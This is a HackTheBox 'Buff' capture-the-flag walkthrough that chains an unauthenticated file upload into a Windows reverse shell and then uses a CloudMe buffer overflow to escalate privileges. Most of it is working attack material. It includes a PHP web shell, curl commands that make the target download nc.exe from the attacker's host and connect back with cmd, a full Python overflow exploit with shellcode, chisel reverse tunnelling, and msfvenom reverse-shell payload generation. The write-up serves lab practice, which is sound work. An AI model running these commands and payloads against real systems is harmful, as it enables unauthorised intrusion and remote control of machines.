
HackTheBox-Buff

OSCP like

20210407-22:28:54-_vBnv5P_jVJSmf

Searching for this gym management software turns up an unauthenticated arbitrary file upload vulnerability; the public exploit uploads a PHP file to the server:

python3 exploit.py -t buff.htb:8080 -f i.php


Upload a PHP file containing the following web shell (the command comes in through the `a` GET parameter):

<?php echo system($_GET['a']); ?>


Download nc.exe to the target through the web shell and spawn a reverse shell. (The target runs antivirus, so some of the files uploaded to it get killed outright.) Both commands are passed URL-encoded in the `a` parameter; the first fetches nc.exe with PowerShell into C:\Users\Public\Downloads, the second connects back to your listener on port 1232 with cmd attached:

curl 'http://10.129.2.18:8080/system_shell.php?a=powershell%20-c%20%22Invoke-WebRequest%20-Uri%20%27http://yourip/nc.exe%27%20-OutFile%20%27C:\Users\Public\Downloads\nc.exe%27%22'

curl 'http://10.129.2.18:8080/system_shell.php?a=C:\Users\Public\Downloads\nc.exe%20yourip%201232%20-e%20cmd'


Enumeration on the box shows a second listener, port 8888, that is not reachable from outside (`netstat -ano` additionally prints the owning PID, which ties the port to its process):

netstat -an


In user shaun's Downloads directory there is a CloudMe installer. Searching for that application turns up a buffer overflow exploit, a PoC that sends a 1500-byte buffer to port 8888:

import socket

# CloudMe listens on the loopback interface of the box, so the PoC is run
# from the target side (or through a tunnel that ends there).
target = "127.0.0.1"

padding1 = b"\x90" * 1052                 # filler up to the saved return address
EIP = b"\xB5\x42\xA8\x68"                 # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30                       # sled between the gadget and the shellcode

# msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

# Pad the total to a fixed 1500 bytes.
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
    s.close()
except Exception as e:
    print(e)

That is the CloudMe listener on port 8888. Since it is bound to the target only, bring 8888 out with chisel: start a server on the attacking machine with reverse tunnels enabled, then have the client on the target open a reverse SOCKS proxy.

./chisel_1.7.6_darwin_amd64 server -p 1233 --reverse

./chisel.exe client your-ip:1233 R:socks

`R:socks` makes the chisel server listen on port 1080 on the attacking machine, so point proxychains at `socks5 127.0.0.1 1080`. Also check that proxychains.conf does not exclude loopback through a `localnet 127.0.0.0/255.0.0.0` line; otherwise a connection to the exploit's target of 127.0.0.1:8888 never enters the tunnel. A plain reverse port forward, `R:8888:127.0.0.1:8888`, is an alternative that needs no proxychains at all.

Generate a reverse-shell payload with the same bad characters and swap it in for the shellcode in the PoC (msfvenom names its variable `buf`, so either rename it to `payload` or pass `-v payload`). The encoded payload has to fit in the 1500 - 1052 - 4 - 30 = 414 bytes the PoC leaves for it. Start a listener on port 1235, then run the exploit through the SOCKS proxy so its 127.0.0.1:8888 target resolves on the box:

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=1235 -f python -b '\x00\x0A\x0D'

proxychains4 python3 48389.py
